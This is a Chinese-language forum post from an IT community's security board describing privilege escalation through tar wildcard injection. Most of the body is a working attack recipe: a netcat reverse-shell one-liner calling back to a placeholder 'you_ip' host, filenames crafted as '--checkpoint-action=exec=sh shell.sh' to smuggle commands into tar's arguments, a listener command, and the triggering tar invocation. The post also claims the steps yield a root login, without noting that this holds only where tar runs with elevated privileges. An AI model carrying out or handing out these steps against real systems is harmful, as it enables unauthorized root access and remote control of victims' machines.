首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微博
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
安全
›
网络安全
›
基于tar通配符漏洞的提权方法
返回列表
发新帖
基于tar通配符漏洞的提权方法
[复制链接]
发表于 2023-2-3 06:32:12
|
显示全部楼层
|
阅读模式
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
以普通用户进入目标机后,若是可以运行tar指令,则可以通过以下的方法进行提权
原理:
tar有通配符*的漏洞,tar用通配符来压缩文件并读取文件名,若是看到有参数则将执行。
操作:
1.先cd到一个用户有完全执行命令的文件夹下
例如:www-data用户的完全权限文件夹为/var/www/html
2.创建一个reverse shell脚本
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc you_ip 1234 >/tmp/f' > shell.sh<br><br>you_ip为本机IP地址<br>1234为将要监听的端口
复制
代码
3.创建tar将要运行的参数
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
touch "/var/www/html/--checkpoint=1"<br>
复制
代码
4.在本机上打开本地监听
nc -lnvp 1234
复制
代码
5.在目标机上执行命令
tar cf /var/www/html.tgz *<br><br>c代表创建<br>f代表类型为文件<br>最后的通配符*是精华所在<br>这整个命令意思就是:<br>因为之前已经cd到/var/www/html目录下了,<br>然后就直接将这整个目录下的所有文件进行压缩,<br>如果遇到参数则执行,压缩后创建一个文件,创建的文件目录可以随便定个可以写入的目录
复制代码
最后在本地机上就已经以root登入了
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!
继续阅读请点击广告
回复
使用道具
举报
返回列表
浏览过的版块
人工智能
程序人生
河曲智叟
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
微信订阅号
微信服务号
微信客服(加群)
H5
小程序
快速回复
返回顶部
返回列表